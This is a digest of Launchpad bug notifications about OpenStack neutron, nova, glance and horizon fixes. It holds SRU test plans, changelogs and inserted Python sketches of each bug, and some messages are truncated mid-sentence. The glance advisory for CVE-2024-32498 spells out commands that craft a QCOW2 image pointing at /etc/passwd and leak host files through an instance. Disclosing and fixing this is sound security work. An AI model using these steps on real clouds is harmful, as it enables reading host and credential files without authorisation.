[Yahoo-eng-team] [Bug 2008943] Re: OVN DB Sync utility cannot find NB DB Port Group
This bug was fixed in the package neutron - 2:18.6.0-0ubuntu1~cloud3

---
neutron (2:18.6.0-0ubuntu1~cloud3) focal-wallaby; urgency=medium

  [ Corey Bryant ]
  * d/p/ovn-db-sync-check-for-router-port-differences.patch: Cherry-picked
    from upstream to ensure router ports are marked as needing updates only
    if they have changed (LP: #2030773).
  * d/p/fix-acl-sync-when-default-sg-group-created.patch: Cherry-picked
    from upstream to fix ACL sync when the default security group is
    created (LP: #2008943).

  [ Mustafa Kemal GILOR ]
  * d/p/add_uplink_status_propagation.patch: Add the
    'uplink-status-propagation' extension to ML2/OVN (LP: #2032770).

** Changed in: cloud-archive/wallaby
   Status: Fix Committed => Fix Released

--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/2008943

Title:
  OVN DB Sync utility cannot find NB DB Port Group

Status in Ubuntu Cloud Archive: Fix Released
Status in Ubuntu Cloud Archive ussuri series: Fix Released
Status in Ubuntu Cloud Archive victoria series: Fix Released
Status in Ubuntu Cloud Archive wallaby series: Fix Released
Status in Ubuntu Cloud Archive xena series: Fix Released
Status in neutron: In Progress
Status in neutron package in Ubuntu: Fix Released
Status in neutron source package in Focal: Fix Released

Bug description:
  A runtime exception:

    ovsdbapp.backend.ovs_idl.idlutils.RowNotFound: Cannot find Port_Group
    with name=pg_aa9f203b_ec51_4893_9bda_cfadbff9f800

  can occur while performing a database sync between the Neutron DB and
  the OVN NB DB using neutron-ovn-db-sync-util. The exception occurs when
  the `sync_networks_ports_and_dhcp_opts()` function ends up implicitly
  creating a new default security group for a tenant/project ID. This is
  normally fine, but `sync_port_groups` has already run at that point, so
  the corresponding port group does not exist in the NB DB. When
  `sync_acls()` is called later, no port group is found and the exception
  is raised.
  Quick way to reproduce on ML2/OVN:

  - openstack project create test_project
  - openstack network create --project test_project test_network
  - openstack port delete $(openstack port list --network test_network -c ID -f value)
    (since this is an empty network, only the metadata port should get
    listed and subsequently deleted)
  - openstack security group delete test_project

  Now that you have a network without a metadata port in it, and no
  default security group for the project/tenant that this network belongs
  to, run:

    neutron-ovn-db-sync-util --config-file /etc/neutron/neutron.conf
      --config-file /etc/neutron/plugins/ml2/ml2_conf.ini
      --ovn-neutron_sync_mode migrate

  The exception should occur.

  Here is a more realistic scenario of how we can run into this with an
  ML2/OVS to ML2/OVN migration. I am also including why the code runs
  into it.

  1. An ML2/OVS environment with a network but no default security group
     for the project/tenant associated with the network.
  2. Perform the ML2/OVS to ML2/OVN migration. This migration process
     runs neutron-ovn-db-sync-util with --migrate.
  3. During the sync we first sync port groups [1] from the Neutron DB to
     the OVN DB.
  4. Then we sync network ports [2]. The process detects that the network
     in question is not part of the OVN NB DB. It creates that network in
     the OVN NB DB and, along with it, a metadata port (an OVN network
     requires a metadata port). The port-create call implicitly notifies
     _ensure_default_security_group_handler [3], which finds no security
     group for that tenant/project ID and creates one. Now you have a new
     security group with 4 new default security group rules.
  5. When sync_acls [4] runs, it picks up those 4 new rules, but the
     commit to the NB DB fails since the port group (aka security group)
     does not exist in the NB DB.

  [1] https://opendev.org/openstack/neutron/src/branch/master/neutron/plugins/ml2/drivers/ovn/mech_driver/ovsdb/ovn_db_sync.py#L104
  [2] https://opendev.org/openstack/neutron/src/branch/master/neutron/plugins/ml2/drivers/ovn/mech_driver/ovsdb/ovn_db_sync.py#L10
  [3] https://opendev.org/openstack/neutron/src/branch/master/neutron/db/securitygroups_db.py#L915
  [4] https://opendev.org/openstack/neutron/src/branch/master/neutron/plugins/ml2/drivers/ovn/mech_driver/ovsdb/ovn_db_sync.py#L107

  = Ubuntu SRU Details =

  [Impact]
  See bug description.

  [Test Case]
  Deploy OpenStack with OVN. Follow the steps in "Quick way to reproduce
  on ML2/OVN" from the bug description.

  [Where problems could occur]
  The fix mitigates the occurrence of the runtime exception; however, the
  fix retries syncing port groups one more time, so there is potential
  for the same runtime exception to be raised.

To manage notifications about this bug go to:
https://bugs.launchpad.net/cloud-archive/+bug/2008943/+subscriptions

--
Mailing list: https://launchpad.n
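The ordering problem above can be sketched with a tiny in-memory model (a minimal sketch: the class, data structures, and `FakeSync` name are invented for illustration; the real code lives in ovn_db_sync.py and talks to OVSDB). Port groups are synced first, the network/port sync then implicitly creates a new default security group, and the ACL sync fails unless, as the fix does, the port-group sync is retried once beforehand:

```python
# Toy model of the neutron-ovn-db-sync ordering bug (illustrative only).

class FakeSync:
    def __init__(self):
        self.neutron_sgs = set()     # security groups in the Neutron DB
        self.nb_port_groups = set()  # port groups in the OVN NB DB

    def sync_port_groups(self):
        # Copy every Neutron security group into the NB DB as a port group.
        self.nb_port_groups |= {f"pg_{sg}" for sg in self.neutron_sgs}

    def sync_networks_ports_and_dhcp_opts(self):
        # Creating the metadata port implicitly creates a *new* default
        # security group in the Neutron DB -- after port groups were synced.
        self.neutron_sgs.add("default_for_tenant")

    def sync_acls(self, resync_port_groups=False):
        if resync_port_groups:  # the fix: retry the port-group sync once
            self.sync_port_groups()
        for sg in self.neutron_sgs:
            if f"pg_{sg}" not in self.nb_port_groups:
                raise LookupError(f"Cannot find Port_Group pg_{sg}")

def run(fixed: bool) -> bool:
    s = FakeSync()
    s.sync_port_groups()
    s.sync_networks_ports_and_dhcp_opts()
    s.sync_acls(resync_port_groups=fixed)
    return True
```

With `fixed=False` the model reproduces the RowNotFound-style failure; with `fixed=True` the retried port-group sync makes the ACL sync succeed.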
[Yahoo-eng-team] [Bug 2030773] Re: OVN DB Sync always logs warning messages about updating all router ports
This bug was fixed in the package neutron - 2:18.6.0-0ubuntu1~cloud3

---
neutron (2:18.6.0-0ubuntu1~cloud3) focal-wallaby; urgency=medium

  [ Corey Bryant ]
  * d/p/ovn-db-sync-check-for-router-port-differences.patch: Cherry-picked
    from upstream to ensure router ports are marked as needing updates only
    if they have changed (LP: #2030773).
  * d/p/fix-acl-sync-when-default-sg-group-created.patch: Cherry-picked
    from upstream to fix ACL sync when the default security group is
    created (LP: #2008943).

  [ Mustafa Kemal GILOR ]
  * d/p/add_uplink_status_propagation.patch: Add the
    'uplink-status-propagation' extension to ML2/OVN (LP: #2032770).

** Changed in: cloud-archive/wallaby
   Status: Fix Committed => Fix Released

--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/2030773

Title:
  OVN DB Sync always logs warning messages about updating all router
  ports

Status in Ubuntu Cloud Archive: Fix Released
Status in Ubuntu Cloud Archive antelope series: Fix Released
Status in Ubuntu Cloud Archive ussuri series: Fix Released
Status in Ubuntu Cloud Archive victoria series: Fix Released
Status in Ubuntu Cloud Archive wallaby series: Fix Released
Status in Ubuntu Cloud Archive xena series: Fix Released
Status in Ubuntu Cloud Archive yoga series: Fix Released
Status in Ubuntu Cloud Archive zed series: Fix Released
Status in neutron: Fix Released
Status in neutron package in Ubuntu: Fix Released
Status in neutron source package in Focal: Fix Released
Status in neutron source package in Jammy: Fix Released
Status in neutron source package in Lunar: Fix Released

Bug description:
  Reported at: https://bugzilla.redhat.com/show_bug.cgi?id=2225156

  The ovn-db-sync script does not check whether router ports are actually
  out of sync before adding them to the list of ports that need to be
  updated. This can create red-herring problems by introducing an
  irrelevant piece of information [0] in the sync report
  (especially when run in "log" mode), making the user think that the
  databases might be out of sync even when they are not.

  Looking at the code [1], we can see that the comment talks about
  checking for networks and ipv6_ra_configs changes, but it does neither;
  instead, it adds every router port to the list of ports that need to be
  updated:

      # We dont have to check for the networks and
      # ipv6_ra_configs values. Lets add it to the
      # update_lrport_list. If they are in sync, then
      # update_router_port will be a no-op.
      update_lrport_list.append(db_router_ports[lrport])

  This LP is about changing this behavior and checking for such
  differences in the router ports before marking them to be updated.

  [0] 2023-07-24 11:46:31.391 952358 WARNING networking_ovn.ovn_db_sync
      [req-1081a8a6-82dd-431c-a2ab-f58741dc1677 - - - - -] Router Port
      port_id=f164c0f1-8ac8-4c45-bba9-8c723a30c701 needs to be updated
      for networks changed
  [1] https://github.com/openstack/neutron/blob/c453813d0664259c4da0d132f224be2eebe70072/neutron/plugins/ml2/drivers/ovn/mech_driver/ovsdb/ovn_db_sync.py#L553-L557

  = Ubuntu SRU Details =

  [Impact]
  See bug description above.

  [Test Case]
  Deploy OpenStack with OVN and multiple routers. Run the ovn-db-sync
  script and ensure router ports that are not out of sync are not marked
  to be updated.

  [Where problems could occur]
  If the _is_router_port_changed() function had a bug, there would be
  potential for ports that need updating to be filtered out. Presumably
  this is not the case, but that is a theoretical potential for where
  problems could occur. All of these patches have already landed in the
  corresponding upstream branches.

To manage notifications about this bug go to:
https://bugs.launchpad.net/cloud-archive/+bug/2030773/+subscriptions

--
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to     : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp
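The check the fix introduces can be sketched as follows (hedged sketch: the dict layout and function names below are simplified stand-ins; upstream's `_is_router_port_changed()` compares OVN NB rows against Neutron DB rows and covers more fields). The point is that a port is appended to `update_lrport_list` only when its networks or ipv6_ra_configs actually differ:

```python
# Illustrative sketch of the router-port diff check; data layout invented.

def is_router_port_changed(db_port: dict, ovn_port: dict) -> bool:
    """Return True only if the fields the sync cares about differ."""
    return (sorted(db_port.get("networks", []))
            != sorted(ovn_port.get("networks", []))
            or db_port.get("ipv6_ra_configs", {})
            != ovn_port.get("ipv6_ra_configs", {}))

def ports_needing_update(db_router_ports: dict,
                         ovn_router_ports: dict) -> list:
    update_lrport_list = []
    for lrport, db_port in db_router_ports.items():
        ovn_port = ovn_router_ports.get(lrport, {})
        # The old behavior appended unconditionally, flooding the sync
        # report with warnings; the fix appends only on a real difference.
        if is_router_port_changed(db_port, ovn_port):
            update_lrport_list.append(db_port)
    return update_lrport_list
```

With this check in place, an in-sync port generates no "needs to be updated" warning at all, instead of relying on `update_router_port` being a no-op.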
[Yahoo-eng-team] [Bug 2032770] Re: [SRU] [OVN] port creation with --enable-uplink-status-propagation does not work with OVN mechanism driver
This bug was fixed in the package neutron - 2:18.6.0-0ubuntu1~cloud3

---
neutron (2:18.6.0-0ubuntu1~cloud3) focal-wallaby; urgency=medium

  [ Corey Bryant ]
  * d/p/ovn-db-sync-check-for-router-port-differences.patch: Cherry-picked
    from upstream to ensure router ports are marked as needing updates only
    if they have changed (LP: #2030773).
  * d/p/fix-acl-sync-when-default-sg-group-created.patch: Cherry-picked
    from upstream to fix ACL sync when the default security group is
    created (LP: #2008943).

  [ Mustafa Kemal GILOR ]
  * d/p/add_uplink_status_propagation.patch: Add the
    'uplink-status-propagation' extension to ML2/OVN (LP: #2032770).

** Changed in: cloud-archive/wallaby
   Status: Fix Committed => Fix Released

--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/2032770

Title:
  [SRU] [OVN] port creation with --enable-uplink-status-propagation does
  not work with OVN mechanism driver

Status in Ubuntu Cloud Archive: Fix Released
Status in Ubuntu Cloud Archive antelope series: Fix Released
Status in Ubuntu Cloud Archive ussuri series: Fix Released
Status in Ubuntu Cloud Archive victoria series: Fix Released
Status in Ubuntu Cloud Archive wallaby series: Fix Released
Status in Ubuntu Cloud Archive xena series: Fix Released
Status in Ubuntu Cloud Archive yoga series: Fix Released
Status in Ubuntu Cloud Archive zed series: Fix Released
Status in neutron: Fix Released
Status in neutron package in Ubuntu: Fix Released
Status in neutron source package in Focal: Fix Released
Status in neutron source package in Jammy: Fix Released
Status in neutron source package in Lunar: Fix Released

Bug description:
  [Impact]
  This SRU is a backport of
  https://review.opendev.org/c/openstack/neutron/+/892895 to the
  respective Ubuntu and UCA releases. The patch is merged to all
  respective upstream branches (master & stable/[u,v,w,x,y,z,2023.1(a)]).
  This SRU intends to add the missing 'uplink-status-propagation'
  extension to ML2/OVN. This extension is already present and working in
  ML2/OVS, and it is supported by ML2/OVN, but the extension is somehow
  not added to ML2/OVN. The patch simply adds the missing extension to
  ML2/OVN too.

  The impact of this is visible for deployments migrating from ML2/OVS to
  ML2/OVN. The following command fails to work on ML2/OVN:

  ```
  openstack port create --network 8d30fb08-2c6a-42fd-98c4-223d345c8c4f \
    --binding-profile trusted=true --enable-uplink-status-propagation \
    --vnic-type direct aaa
  # BadRequestException: 400: Client Error for url:
  # https://mycloud.example.com:9696/v2.0/ports, Unrecognized attribute(s)
  # 'propagate_uplink_status'
  ```

  The fix corrects this behavior by adding the missing extension.

  [Test Case]
  - Deploy a Focal/Yoga cloud:
    - ./generate-bundle.sh -s focal -r yoga --name test-focal-yoga-stack --run --ovn
  - After the dust settles:
    - ./configure
    - source ./novarc
    - openstack port create --network --binding-profile trusted=true --enable-uplink-status-propagation --vnic-type direct aaa
    - It should fail with "BadRequestException: 400: Client Error for
      url: https://mycloud.example.com:9696/v2.0/ports, Unrecognized
      attribute(s) 'propagate_uplink_status'"
  - To confirm the fix, repeat the scenario and observe that the error
    disappears and port creation succeeds.

  [Regression Potential]
  The patch is quite trivial and should not affect any deployment
  negatively. The extension is optional and disabled by default.

To manage notifications about this bug go to:
https://bugs.launchpad.net/cloud-archive/+bug/2032770/+subscriptions
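Conceptually the patch is tiny: an ML2 mechanism driver advertises the API extension aliases it supports, and the fix adds the missing alias to that list. A hedged sketch of the mechanism (the list contents and helper names below are illustrative, not copied from neutron):

```python
# Simplified model of how a mechanism driver's advertised extension list
# gates API attributes. Names and list contents are illustrative.

def add_uplink_status_propagation(aliases: list) -> list:
    """The gist of the fix: advertise the previously missing alias."""
    if "uplink-status-propagation" not in aliases:
        aliases.append("uplink-status-propagation")
    return aliases

def is_attribute_recognized(aliases: list, attribute: str) -> bool:
    # The API layer rejects 'propagate_uplink_status' with a 400
    # ("Unrecognized attribute(s)") unless the extension that defines it
    # is advertised by the loaded driver.
    if attribute == "propagate_uplink_status":
        return "uplink-status-propagation" in aliases
    return True
```

Before the fix the ML2/OVN alias list lacked the entry, so `propagate_uplink_status` was rejected; after appending it, the same port-create request is accepted.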
[Yahoo-eng-team] [Bug 1999814] Re: [SRU] Allow for specifying common baseline CPU model with disabled feature
Hello Paul, or anyone else affected,

Accepted nova into yoga-proposed. The package will build now and be
available in the Ubuntu Cloud Archive in a few hours, and then in the
-proposed repository.

Please help us by testing this new package. To enable the -proposed
repository:

  sudo add-apt-repository cloud-archive:yoga-proposed
  sudo apt-get update

Your feedback will aid us getting this update out to other Ubuntu users.
If this package fixes the bug for you, please add a comment to this bug,
mentioning the version of the package you tested, and change the tag from
verification-yoga-needed to verification-yoga-done. If it does not fix
the bug for you, please add a comment stating that, and change the tag to
verification-yoga-failed. In either case, details of your testing will
help us make a better decision.

Further information regarding the verification process can be found at
https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in
advance!

** Also affects: cloud-archive
   Importance: Undecided
   Status: New

** Also affects: cloud-archive/ussuri
   Importance: Undecided
   Status: New

** Also affects: cloud-archive/yoga
   Importance: Undecided
   Status: New

** Changed in: cloud-archive
   Status: New => Invalid

** Changed in: cloud-archive/yoga
   Status: New => Fix Committed

** Tags added: verification-yoga-needed

--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1999814

Title:
  [SRU] Allow for specifying common baseline CPU model with disabled
  feature

Status in Ubuntu Cloud Archive: Invalid
Status in Ubuntu Cloud Archive ussuri series: New
Status in Ubuntu Cloud Archive yoga series: Fix Committed
Status in OpenStack Compute (nova): Expired
Status in OpenStack Compute (nova) ussuri series: New
Status in OpenStack Compute (nova) victoria series: Won't Fix
Status in OpenStack Compute (nova) wallaby series: Won't Fix
Status in OpenStack Compute (nova) xena series: Won't Fix
Status in OpenStack Compute (nova) yoga series: New
Status in nova package in Ubuntu: Fix Released
Status in nova source package in Bionic: Won't Fix
Status in nova source package in Focal: Fix Released
Status in nova source package in Jammy: Fix Released

Bug description:
  SRU TEMPLATE AT THE BOTTOM ***

  Hello,

  This is very similar to pad.lv/1852437 (and the related blueprint at
  https://blueprints.launchpad.net/nova/+spec/allow-disabling-cpu-flags),
  but there is a very different and important nuance.

  A customer I'm working with has two classes of blades that they're
  trying to use. Their existing ones are Cascade Lake-based; they are
  presently using the Cascadelake-Server-noTSX CPU model via
  libvirt.cpu_model in nova.conf. Their new blades are Ice Lake-based, a
  newer processor that would typically also be able to run with the
  Cascade Lake feature set, except that these Ice Lake processors lack
  the MPX feature defined in the Cascadelake-Server-noTSX model. The
  result of this is evident when I try to start nova on the new blades
  with the Ice Lake CPUs.
  Even if I specify the following in my nova.conf:

    [libvirt]
    cpu_mode = custom
    cpu_model = Cascadelake-Server-noTSX
    cpu_model_extra_flags = -mpx

  that is not enough to allow nova to start; it fails in the libvirt
  driver in the _check_cpu_compatibility function:

  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service Traceback (most recent call last):
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service   File "/usr/lib/python3/dist-packages/nova/virt/libvirt/driver.py", line 771, in _check_cpu_compatibility
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service     self._compare_cpu(cpu, self._get_cpu_info(), None)
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service   File "/usr/lib/python3/dist-packages/nova/virt/libvirt/driver.py", line 8817, in _compare_cpu
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service     raise exception.InvalidCPUInfo(reason=m % {'ret': ret, 'u': u})
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service nova.exception.InvalidCPUInfo: Unacceptable CPU info: CPU doesn't have compatibility.
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 0
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service Refer to http://libvirt.org/html/libvirt-libvirt-host.html#virCPUCompareResult
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service During handling of the above exception, another exception occurred:
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service Traceback (most
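The intent behind the requested behavior can be modeled with simple set arithmetic (a hedged sketch under stated assumptions: the feature sets below are invented excerpts, and the real check goes through libvirt's CPU comparison, not Python sets). A host should be accepted if it provides every feature of the named baseline model except those explicitly disabled with a leading '-' in cpu_model_extra_flags:

```python
# Hedged model of the desired compatibility check; feature names and model
# contents are illustrative, not copied from libvirt's CPU map.

CPU_MODEL_FEATURES = {
    # Tiny excerpt of what a model definition might contain.
    "Cascadelake-Server-noTSX": {"avx512f", "mpx", "pku", "ssse3"},
}

def host_is_compatible(model, extra_flags, host_features):
    required = set(CPU_MODEL_FEATURES[model])
    for flag in extra_flags:
        if flag.startswith("-"):       # e.g. "-mpx" disables a feature
            required.discard(flag[1:])
        else:
            required.add(flag)
    return required <= host_features   # host must supply what remains

# An Ice Lake-like host: everything in the model except mpx.
ICELAKE = {"avx512f", "pku", "ssse3", "avx512_vnni"}
```

Under this model the Ice Lake host is rejected against the bare Cascadelake-Server-noTSX baseline but accepted once `-mpx` removes MPX from the required set, which is exactly what the bug asks `cpu_model_extra_flags = -mpx` to achieve.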
[Yahoo-eng-team] [Bug 2024258] Re: Performance degradation archiving DB with large numbers of FK related records
Hello melanie, or anyone else affected,

Accepted nova into yoga-proposed. The package will build now and be
available in the Ubuntu Cloud Archive in a few hours, and then in the
-proposed repository.

Please help us by testing this new package. To enable the -proposed
repository:

  sudo add-apt-repository cloud-archive:yoga-proposed
  sudo apt-get update

Your feedback will aid us getting this update out to other Ubuntu users.
If this package fixes the bug for you, please add a comment to this bug,
mentioning the version of the package you tested, and change the tag from
verification-yoga-needed to verification-yoga-done. If it does not fix
the bug for you, please add a comment stating that, and change the tag to
verification-yoga-failed. In either case, details of your testing will
help us make a better decision.

Further information regarding the verification process can be found at
https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in
advance!

** Also affects: cloud-archive
   Importance: Undecided
   Status: New

** Also affects: cloud-archive/ussuri
   Importance: Undecided
   Status: New

** Also affects: cloud-archive/yoga
   Importance: Undecided
   Status: New

** Changed in: cloud-archive
   Status: New => Invalid

** Changed in: cloud-archive/yoga
   Status: New => Fix Committed

** Tags added: verification-yoga-needed

--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/2024258

Title:
  Performance degradation archiving DB with large numbers of FK related
  records

Status in Ubuntu Cloud Archive: Invalid
Status in Ubuntu Cloud Archive ussuri series: Fix Committed
Status in Ubuntu Cloud Archive yoga series: Fix Committed
Status in OpenStack Compute (nova): Fix Released
Status in OpenStack Compute (nova) antelope series: In Progress
Status in OpenStack Compute (nova) wallaby series: In Progress
Status in OpenStack Compute (nova) xena series: In Progress
Status in OpenStack Compute (nova) yoga series: In Progress
Status in OpenStack Compute (nova) zed series: In Progress
Status in nova package in Ubuntu: Won't Fix
Status in nova source package in Focal: Fix Released
Status in nova source package in Jammy: Fix Released

Bug description:
  [Impact]
  Originally, Nova archives deleted rows in batches consisting of a
  maximum number of parent rows (max_rows) plus their child rows, all
  within a single database transaction. This approach limits the maximum
  value of max_rows that can be specified by the caller due to the
  potential size of the database transaction it could generate.
  Additionally, this behavior can cause the cleanup process to frequently
  encounter the following error:

    oslo_db.exception.DBError: (pymysql.err.InternalError) (3100, "Error
    on observer while running replication hook 'before_commit'.")

  The error arises when the transaction exceeds the group replication
  transaction size limit, a safeguard implemented to prevent potential
  MySQL crashes [1]. The default value for this limit is approximately
  143MB.

  [Fix]
  An upstream commit has changed the logic to archive one parent row and
  its related child rows in a single database transaction. This change
  allows operators to choose more predictable values for max_rows and
  achieve more progress with each invocation of archive_deleted_rows.
  Additionally, this commit reduces the chances of encountering the issue
  where the transaction size exceeds the group replication transaction
  size limit.

    commit 697fa3c000696da559e52b664c04cbd8d261c037
    Author: melanie witt
    CommitDate: Tue Jun 20 20:04:46 2023 +

        database: Archive parent and child rows "trees" one at a time

  [Test Plan]
  1. Create an instance and delete it in OpenStack.
  2. Log in to the Nova database and confirm that there is an entry with
     a deleted_at value that is not NULL.
       select display_name, deleted_at from instances where deleted_at <> 0;
  3. Execute the following command, ensuring that the timestamp specified
     in --before is later than the deleted_at value:
       nova-manage db archive_deleted_rows --before "XXX-XX-XX XX:XX:XX" --verbose --until-complete
  4. Log in to the Nova database again and confirm that the entry has
     been archived and removed.
       select display_name, deleted_at from instances where deleted_at <> 0;

  [Where problems could occur]
  The commit changes the logic for archiving deleted entries to reduce
  the size of transactions generated during the operation. If the patch
  contains errors, it will only impact the archiving of deleted entries
  and will not affect other functionalities.

  [1] https://bugs.mysql.com/bug.php?id=84785

  [Original Bug Description]
  Observed downstream in a large scale cluster with constant
  create/delete server activity and hundreds of thousands of deleted
  instances rows. Currently, we archiv
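The before/after transaction shapes can be sketched with an in-memory model (a minimal sketch under invented structures; the real implementation moves rows into shadow tables via SQL and counts bytes, not rows). The old mode accumulates up to max_rows parents plus all their FK-related children into one transaction; the fixed mode commits one parent "tree" at a time, bounding each transaction:

```python
# Toy model of nova's archive change: one parent row and its child rows
# per transaction, instead of batching max_rows parents into one.

TXN_SIZE_LIMIT = 5  # stand-in for the group-replication transaction cap

def archive(parents, max_rows, per_tree):
    """Return the row count of each transaction that would be committed."""
    txn_sizes = []
    pending = 0
    for parent_id, children in list(parents.items())[:max_rows]:
        tree_rows = 1 + len(children)   # parent + its FK-related rows
        if per_tree:
            txn_sizes.append(tree_rows)  # fixed: one tree per transaction
        else:
            pending += tree_rows         # old: accumulate into one txn
    if not per_tree:
        txn_sizes.append(pending)
    return txn_sizes

def exceeds_limit(txn_sizes):
    return any(s > TXN_SIZE_LIMIT for s in txn_sizes)
```

With three parents of three children each, the old mode produces a single 12-row transaction (over the toy limit), while the per-tree mode produces three 4-row transactions, which is why max_rows becomes predictable after the fix.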
[Yahoo-eng-team] [Bug 2059809] Re: [OSSA-2024-001] Arbitrary file access through QCOW2 external data file (CVE-2024-32498)
This bug was fixed in the package glance -
2:29.0.0~b2+git2024080717.695fcb67-0ubuntu1~cloud0

---
glance (2:29.0.0~b2+git2024080717.695fcb67-0ubuntu1~cloud0) noble-dalmatian; urgency=medium

  * New upstream release for the Ubuntu Cloud Archive.

glance (2:29.0.0~b2+git2024080717.695fcb67-0ubuntu1) oracular; urgency=medium

  * New upstream snapshot for OpenStack Dalmatian.
  * d/control: Align (Build-)Depends with upstream.
  * d/p/CVE*.patch: Drop, included in snapshot.

glance (2:28.0.1-0ubuntu3) oracular; urgency=medium

  * SECURITY UPDATE: Arbitrary file access via custom QCOW2 external data
    (LP: #2059809)
    - debian/patches/CVE-2024-32498-1.patch: reject qcow files with
      data-file attributes.
    - debian/patches/CVE-2024-32498-2.patch: extend format_inspector for
      QCOW safety.
    - debian/patches/CVE-2024-32498-3.patch: add VMDK safety check.
    - debian/patches/CVE-2024-32498-4.patch: reject unsafe qcow and vmdk
      files.
    - debian/patches/CVE-2024-32498-5.patch: add QED format detection to
      format_inspector.
    - debian/patches/CVE-2024-32498-6.patch: add file format detection to
      format_inspector.
    - debian/patches/CVE-2024-32498-7.patch: add safety check and
      detection support to FI tool.
    - CVE-2024-32498

** Changed in: cloud-archive
   Status: Fix Committed => Fix Released

--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Glance.
https://bugs.launchpad.net/bugs/2059809

Title:
  [OSSA-2024-001] Arbitrary file access through QCOW2 external data file
  (CVE-2024-32498)

Status in Cinder: Fix Released
Status in Ubuntu Cloud Archive: Fix Released
Status in Ubuntu Cloud Archive antelope series: Fix Released
Status in Ubuntu Cloud Archive bobcat series: Fix Released
Status in Ubuntu Cloud Archive caracal series: Fix Released
Status in Ubuntu Cloud Archive ussuri series: Fix Committed
Status in Ubuntu Cloud Archive yoga series: Fix Released
Status in Glance: Fix Released
Status in OpenStack Compute (nova): Fix Released
Status in OpenStack Security Advisory: Fix Released

Bug description:
  OpenStack has a security vulnerability in Nova or Glance that allows an
  authenticated attacker to read arbitrary files. QCOW2 has two
  mechanisms to read from another file: the backing file issue was
  reported and fixed with OSSA-2015-014, but the external data file was
  not discovered.

  Steps to Reproduce:

  - Create a disk image:
    `qemu-img create -f qcow2 -o data_file=abcdefghigh,data_file_raw=on disk.qcow2 1G`
    with `abcdefghigh` a placeholder of the same length as the file to
    read. `qemu-img` will zero it.
  - Replace the filename in the disk image:
    `sed -i "s#abcdefghigh#/etc/passwd#" disk.qcow2`
  - Upload/register the disk image:
    `openstack image create --disk-format qcow2 --container-format bare --file "disk.qcow2" --private "my-image"`
  - Create a new instance:
    `openstack server create --flavor "nano" --image "my-image" "my-instance"`

  With the non-bootable instance there might be two ways to continue:

  Option 1:
  - Derive a new image:
    `openstack server image create --name "my-leak" "my-instance"`
  - Download the image:
    `openstack image save --file "leak.qcow2" "my-leak"`
  - The file content starts at guest cluster 0.

  Option 2 (this is untested because I reproduced it only in a
  production system):
  - Reboot the instance in rescue mode:
    `openstack server rescue --image "cirros-0.6.2-x86_64-disk" "my-instance"`
  - Go to the Dashboard, open the console of the instance, and log in to
    the instance.
  - Extract content from `/dev/sdb` with
    `cat /dev/sdb | fold -w 1024 | head -n 32`,
    `xxd -l 1024 -c 32 /dev/sdb`, or similar methods.
  - It might be possible to write to the host file. If the disk image is
    mounted with `qemu-nbd`, writes go through to the external data file.

To manage notifications about this bug go to:
https://bugs.launchpad.net/cinder/+bug/2059809/+subscriptions
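The class of check the CVE patches add to the format inspector can be illustrated by parsing the QCOW2 header directly (a simplified sketch based on the public qcow2 on-disk specification, not Glance's actual format_inspector code): a version-3 header carries a 64-bit big-endian incompatible-features bitmask at byte offset 72, and bit 2 marks an external data file, which a safe uploaded image should never declare:

```python
import struct

QCOW2_MAGIC = b"QFI\xfb"
INCOMPAT_OFFSET = 72             # 8-byte big-endian bitmask in a v3 header
EXTERNAL_DATA_FILE_BIT = 1 << 2  # per the qcow2 on-disk specification

def qcow2_has_external_data_file(header: bytes) -> bool:
    """True if the image header declares an external data file."""
    if header[:4] != QCOW2_MAGIC:
        raise ValueError("not a qcow2 image")
    version = struct.unpack(">I", header[4:8])[0]
    if version < 3:
        return False             # the feature bitmask only exists in v3+
    (features,) = struct.unpack(
        ">Q", header[INCOMPAT_OFFSET:INCOMPAT_OFFSET + 8])
    return bool(features & EXTERNAL_DATA_FILE_BIT)

def make_fake_header(version: int, features: int) -> bytes:
    # Build just enough of a zero-padded header for the check above.
    buf = bytearray(104)
    buf[0:4] = QCOW2_MAGIC
    buf[4:8] = struct.pack(">I", version)
    buf[INCOMPAT_OFFSET:INCOMPAT_OFFSET + 8] = struct.pack(">Q", features)
    return bytes(buf)
```

An image created with `-o data_file=...` as in the reproduction steps sets this bit, so rejecting any image where the check returns True blocks the attack before the file is ever handed to qemu.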
[Yahoo-eng-team] [Bug 1728031] Re: [SRU] Unable to change user password when ENFORCE_PASSWORD_CHECK is True
This bug was fixed in the package horizon -
4:25.0.0+git2024080809.d171cee3-0ubuntu1~cloud0

---
horizon (4:25.0.0+git2024080809.d171cee3-0ubuntu1~cloud0) noble-dalmatian; urgency=medium

  * New upstream release for the Ubuntu Cloud Archive.

horizon (4:25.0.0+git2024080809.d171cee3-0ubuntu1) oracular; urgency=medium

  * New upstream snapshot for OpenStack Dalmatian:
    - Refresh xstatic assets.
    - d/p/lp1728031.patch: removed, patch was merged to upstream.
    - d/p/lp2054799.patch: removed, patch was merged to upstream.

